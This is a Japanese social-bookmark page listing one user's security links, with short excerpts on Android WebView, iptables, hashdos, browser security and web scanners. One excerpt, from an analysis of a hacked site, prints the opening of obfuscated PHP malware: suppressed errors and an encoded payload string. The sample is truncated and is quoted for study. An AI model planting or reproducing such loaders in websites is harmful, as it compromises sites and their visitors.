securityに関するfujimognのブックマーク (76)
-
fujimogn 2020/01/08
-
-
-
Androidの脆弱性を見つけちゃった話
JVN#53768697 Android OS において任意の Java のメソッドが実行される脆弱性 が公表されました。 不肖私が昨年9月にIPAに届け出たものです。 これまでは情報非開示依頼があったので多くを語ることができませんでした。 ヤバい内容なのでみんなに注意喚起したかったけれどそれができない苦しさ。 周りでICS端末を使ってる人を見かけたら「事情は言えないけどブラウザにはChromeを使って。標準ブラウザ使わないで」と言うくらいしかできなくて申し訳ありませんでしたm(_ _)m 当時のいきさつを日記から掘り起こして記録に残しておきたいと思います。 2012年9月15日(土) WebViewを使ったビジネスアプリのフレームワークを作りたいという構想があって(PhoneGapにはないビジネス用の固有の機能を入れようと思って。バーコードリーダーとか印刷機能とか)、そういえば addJ
-
-
俺史上最強のiptablesをさらす - Qiita
Deleted articles cannot be recovered. Draft of this article would be also deleted. Are you sure you want to delete this article? #!/bin/bash ########################################################### # このスクリプトの特徴 # # 受信・通過については基本的に破棄し、ホワイトリストで許可するものを指定する。 # 送信については基本的に許可する。ただし、サーバが踏み台になり外部のサーバに迷惑をかける可能性があるので、 # 心配な場合は、送信も受信同様に基本破棄・ホワイトリストで許可するように書き換えると良い。 #########################################
-
そらいさんのサイトが改竄されたそうなので解析してみた
そらいさんのサービスが改ざん被害にあったとのことで、攻撃コードが載っていたので解析して見ました。 ということで、上記のコードを解析しましたが、難読化の仕組みは単純なのですが、コードを追いかけるのに中々疲れましたww 問題のコード問題のコードはこれです。 <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiL
-
-
heise online – IT news, guides and background information | heise online
Discover cutting-edge IT insights from Europe's largest tech editorial team. Explore curated breaking news and expert opinions for tech enthusiasts and pros. Don't miss any news – follow us on Facebook, LinkedIn or Mastodon. French data protection authorities have imposed a fine of 50 million euros on telecommunications giant Orange for inbox advertising without consent. Every year, the state spen
-
いま一番危ない脆弱性は何だ? ~2011年版~
以前、Gumblar攻撃の被害に遭ったクライアントPCの調査から判明した、クライアントパソコン(PC)に放置されやすい脆弱性について解説した(関連記事)。前回の調査では、クライアントPCに放置されやすい脆弱性の1位はJava、ほぼ同数の2位がAdobe Readerという結果だった。前回の調査から1年経過し、この傾向に変化があるか、改めて同様の調査した。その結果について解説する。 前回の調査では、Gumblar攻撃の被害に遭ったクライアントPCを対象としたが、今回は、Black Hole Exploit Kitと呼ばれるドライブバイダウンロード攻撃ツールの被害にあったクライアントPCを対象にした。この攻撃ツールは、2011年上半期に日本IBM セキュリティー・オペレーション・センター(以下、東京SOC)の観測範囲において最もウイルス感染の被害が多かった攻撃ツールである(表1)。 表1●Ex
-
-
-
広範なWebアプリ開発言語にDoS攻撃につながる脆弱性 - @IT
2012/01/06 情報処理推進機構(IPA)は1月6日、広くWebアプリケーション構築に用いられている開発言語やフレームワークに、DoS攻撃につながる脆弱性が発見されたことを踏まえ、緊急対策情報を公開した。 影響を受けるのは、PHPやRubyといった開発言語のほか、WebアプリケーションフレームワークのApache Tomcat、Microsoft .NET Frameworkなど。これらの言語が実装しているハッシュテーブル機構に脆弱性がある。わざとハッシュ値が同じ値になるようなパラメータを大量に送り付け、「ハッシュ衝突」状態を作り出すとDoS状態に陥ってしまう。いわゆる「Hashdos」という攻撃で、例えばPOSTフォームからこうしたデータを送信することで、Webアプリケーションが停止するなどの被害が考えられる。 この脆弱性を踏まえ、マイクロソフトは2011年12月30日に、Micr
-
高木浩光@自宅の日記 - spモードはなぜIPアドレスに頼らざるを得なかったか
■ spモードはなぜIPアドレスに頼らざるを得なかったか spモードの事故 NTT docomoのスマホ向け独自サービス「spモード」が、今月20日に大規模な事故を起こして、重大事態となっている。 スマホ向けネット接続が不具合 ドコモ 別人のアドレス表示, MSN産経ニュース, 2011年12月20日 ドコモのspモードで不具合、他人のメールアドレスが設定される恐れ, 日経IT Pro, 2011年12月21日 ドコモの「spモード」でトラブル、関連サービスが一時停止, ケータイ Watch, 2011年12月21日 ドコモ、spモード障害で「ネットワーク基盤高度化対策本部」設置, ケータイ Watch, 2011年12月26日 ドコモ 約1万9000人に影響, NHKニュース, 2011年12月27日 ドコモの“メアド置き換え”不具合、影響数や新事象が明らかに, ケータイ Watch,
-
「最も安全なウェブブラウザはどれか?」に関する調査結果 | ライフハッカー・ジャパン
Googleがスポンサーとなり、情報セキュリティ調査会社「Accuvant Labs」によって実施された、主要三大ブラウザのセキュリティに関する最新の調査結果(英文)が明らかになりました。これによると、Chromeがセキュリティ機能ではベストである一方、Firefoxはセキュリティ保護の観点から、Internet Explorerよりも下という結果に...。それでは、その内容について詳しく見ていきましょう。 Accuvantでは、Firefox、Google Chrome、Internet Explorerの3つのブラウザについて調査。2011年7月時点で最新バージョンだったブラウザを、32-bitの『Windows 7』で検証しました。今回の調査では、SafariやOperaなど、他のブラウザは調査対象から外されていますが、今後これらに関する調査結果も、随時更新していく方針だそうです。
-
Webアプリケーションに対する広範なDoS攻撃手法(hashdos)の影響と対策
28C3(28th Chaos Communication Congress)において、Effective Denial of Service attacks against web application platforms(Webプラットフォームに対する効果的なサービス妨害攻撃)と題する発表がありました(タイムスケジュール、講演スライド)。 これによると、PHPをはじめとする多くのWebアプリケーション開発プラットフォームに対して、CPU資源を枯渇させるサービス妨害攻撃(DoS攻撃)が可能な手法が見つかったということです。この攻撃は、hashdos と呼ばれています。 概要PHPなど多くの言語では、文字列をキーとする配列(連想配列、ハッシュ)が用意されており、HTTPリクエストのパラメータも連想配列の形で提供されます。PHPの場合、$_GET、$_POSTなどです。 連想配列の実装には
-
脆弱性対策情報共有フレームワーク - MyJVN
MyJVN にようこそ MyJVN は JVN iPediaの情報を、利用者が効率的に活用して頂けるように、 脆弱性対策情報を効率的に収集したり、利用者のPC上にインストールされたソフトウェア 製品のバージョンを容易にチェックする等の機能を提供する仕組み(フレームワーク)です。
-
Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS)
Jeff Darcy has written a while back about the (lack of) security in NoSQL database. Unfortunately things haven’t changed much and if you check the NoSQL + Node.js applications I’ve posted lately you’ll notice that some of them are completely ignoring security. And there are some people realizing the risks and starting to express their concerns: Playing with MongoDB lately, I’m getting scared. Beca
-
-
w3af - Open Source Web Application Security Scanner
SQL injection, Cross-Site scripting and much more Use w3af to identify more than 200 vulnerabilities and reduce your site’s overall risk exposure. Identify vulnerabilities like SQL Injection, Cross-Site Scripting, Guessable credentials, Unhandled application errors and PHP misconfigurations. For a complete reference for all plugins and vulnerabilities read through the plugin documentation. Easy to
公式Twitter
- @HatenaBookmark
リリース、障害情報などのサービスのお知らせ
- @hatebu
最新の人気エントリーの配信
キーボードショートカット一覧
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
